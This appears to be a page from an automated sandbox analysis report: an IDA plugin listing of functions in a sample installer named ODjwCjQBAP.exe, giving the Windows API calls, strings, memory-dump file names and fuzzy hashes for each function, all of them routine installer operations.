Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: /7r$Call$N$open
API String ID: 3615053054-4149431763
Opcode ID: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
Instruction ID: 93f755629d35b640548b5af6b7c61ab120d2ba211fed136cde477a70902604c8
Opcode Fuzzy Hash: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
Instruction Fuzzy Hash: 5D61A3B1A40209BFEB109F61DC45F6A7B69FB84714F10803AFB057A2D1C7B8A951CF99

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5

Function 00405C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405DD3,?,?), ref: 00405C4F
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405DD3,?,?), ref: 00405C73
GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405C7C

Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11

GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C99
wsprintfA.USER32 ref: 00405CB7
GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405CF2
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D01
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D39
SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D8F
GlobalFree.KERNEL32(00000000), ref: 00405DA0
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DA7

Part of subcall function 00405B6A: GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\ODjwCjQBAP.exe,80000000,00000003), ref: 00405B6E
Part of subcall function 00405B6A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90

Strings

[Rename], xrefs: 00405D21, 00405D33
%s=%s, xrefs: 00405CAD
NUL, xrefs: 00405C49

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 13050e4631be9f4a8a8c31851d4856950631349ab05fbd5c9e4b7c65e501b528
Instruction ID: 58b8e60db813422e8a8f05baf12fe1cb7cc397f7baf35d3febd204dd1aeecf15
Opcode Fuzzy Hash: 13050e4631be9f4a8a8c31851d4856950631349ab05fbd5c9e4b7c65e501b528
Instruction Fuzzy Hash: D031C271A04B596BD2202B219D49F6B3A6CDF85754F18003BF901F62D2E67CA8018EAD

Function 00406162 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ODjwCjQBAP.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061BA
CharNextA.USER32(?,?,?,00000000), ref: 004061C7
CharNextA.USER32(?,"C:\Users\user\Desktop\ODjwCjQBAP.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061CC
CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061DC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406163
*?|<>/":, xrefs: 004061AA
"C:\Users\user\Desktop\ODjwCjQBAP.exe", xrefs: 0040619E

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ODjwCjQBAP.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2578066266
Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction ID: 28f88d73301ddfe76a8902f897fcc58808f561dcfc6ac49559e28e986a88295b
Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction Fuzzy Hash: AF11C8718083912DFB3216644C44B777F998F9A760F19007BE9D6762C3C67C5C53826D

Function 00404143 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404160
GetSysColor.USER32(00000000), ref: 0040417C
SetTextColor.GDI32(?,00000000), ref: 00404188
SetBkMode.GDI32(?,?), ref: 00404194
GetSysColor.USER32(?), ref: 004041A7
SetBkColor.GDI32(?,?), ref: 004041B7
DeleteObject.GDI32(?), ref: 004041D1
CreateBrushIndirect.GDI32(?), ref: 004041DB

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: 7122de99037e03f190bb62226e04253736cb74e6c142f140589d3e5d77d1f23d
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: DB21A4B5804704ABCB219F78DD08B5BBBF8AF41714F048629E995E62E0C734E944CB55

Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 1000234A

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
GlobalFree.KERNEL32(00000000), ref: 100022FB

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61

Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B5
GlobalFree.KERNEL32(00000000), ref: 100024EF

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62

Function 00402CAB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402CC3
GetTickCount.KERNEL32 ref: 00402CE1
wsprintfA.USER32 ref: 00402D0F

Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll), ref: 0040517E
Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC

CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402D33
ShowWindow.USER32(00000000,00000005), ref: 00402D41

Part of subcall function 00402C8F: MulDiv.KERNEL32(0002E496,00000064,00033077), ref: 00402CA4

Strings

... %d%%, xrefs: 00402D09

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 78a221e97a99680450e3ca11bf4e3b45821cb4013d8a2558b5166950edff25d0
Instruction ID: 547fa0e596d0efa3134ade0ba199646732fee1a7f54f1ab5f8be41358a9578df
Opcode Fuzzy Hash: 78a221e97a99680450e3ca11bf4e3b45821cb4013d8a2558b5166950edff25d0
Instruction Fuzzy Hash: DC019BB0906614E7EB21BB64EF0DEDE766CEB04701B444037F405B11E5C7B89941D79E

Function 004049DB Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049F6
GetMessagePos.USER32 ref: 004049FE
ScreenToClient.USER32(?,?), ref: 00404A18
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A2A
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A50

Strings

f, xrefs: 00404A2C

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 2232a7e87341d92c9ad346ae082ec06308d60ff2d87fc7f715a57a5a5eae5b25
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: E5018071E40219BADB00DB94CC41BFEBBB8AB45711F10412BBA10B61C0D7B465018BA5

Function 00402C13 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
wsprintfA.USER32 ref: 00402C62
SetWindowTextA.USER32(?,?), ref: 00402C72
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C84

Strings

unpacking data: %d%%, xrefs: 00402C50, 00402C60
verifying installer: %d%%, xrefs: 00402C57

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction ID: e0e458c2d16b5d3c5a169a1492fe07981551179f6e5c56f92d0567975436b572
Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction Fuzzy Hash: 35F0317090420DABEF205F60CD0AFAE3769EB04345F00C43AFA16B51D0D7B99A55CB59

Function 00402749 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
GlobalFree.KERNEL32(?), ref: 004027F2
GlobalFree.KERNEL32(00000000), ref: 00402805
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 7d68071d91978c31b4045b951977b232c33a3f1e4c4fbf1767583406490216b2
Instruction ID: 589acf511f7bba285ed25554ef0f071862dbcd9cf46fffc414e4c77000f41e55
Opcode Fuzzy Hash: 7d68071d91978c31b4045b951977b232c33a3f1e4c4fbf1767583406490216b2
Instruction Fuzzy Hash: 5E219A71C04128BBCF216FA5CE89DAE7A79AF09324F14423AF520762E1C6795D40DBA9

Function 004048D1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(indfrselsartikel Setup: Installing,indfrselsartikel Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
wsprintfA.USER32 ref: 00404977
SetDlgItemTextA.USER32(?,indfrselsartikel Setup: Installing), ref: 0040498A

Strings

%u.%u%s%s, xrefs: 00404959
indfrselsartikel Setup: Installing, xrefs: 00404961, 00404966, 0040496C, 00404980

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$indfrselsartikel Setup: Installing
API String ID: 3540041739-1387766795
Opcode ID: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
Instruction ID: 7f1be1aa0c85ccb86495671cb382a06f82cddcf8175a130fa0267404931b34df
Opcode Fuzzy Hash: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
Instruction Fuzzy Hash: CF11B7736041283BDB0065799D45EAF3298DB85374F250637FA25F21D1E978CC1255EC

Function 00403B3C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F20), ref: 00403BD4

Strings

indfrselsartikel Setup: Installing, xrefs: 00403B3F
/7r, xrefs: 00403BB1
1033, xrefs: 00403B40, 00403B4A, 00403BBB
"C:\Users\user\Desktop\ODjwCjQBAP.exe", xrefs: 00403B3D

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\ODjwCjQBAP.exe"$/7r$1033$indfrselsartikel Setup: Installing
API String ID: 530164218-2260871779
Opcode ID: 67c3d82ce6484f9e1e19bcd04ff1a02b9bccfbab982ecba75f5a52bbb9d475e3
Instruction ID: c62297436265aa8c4426bdacc88999ed38b20c31bf5381ba95a45bc0aedbf607
Opcode Fuzzy Hash: 67c3d82ce6484f9e1e19bcd04ff1a02b9bccfbab982ecba75f5a52bbb9d475e3
Instruction Fuzzy Hash: 6711D8B1B046119BC730AF15DD50A77777DEB8475A328813FE901A73D2C73DAE029A98

Function 1000180D Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001869
GlobalFree.KERNEL32(?), ref: 100019EF
GlobalFree.KERNEL32(?), ref: 100019F4

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
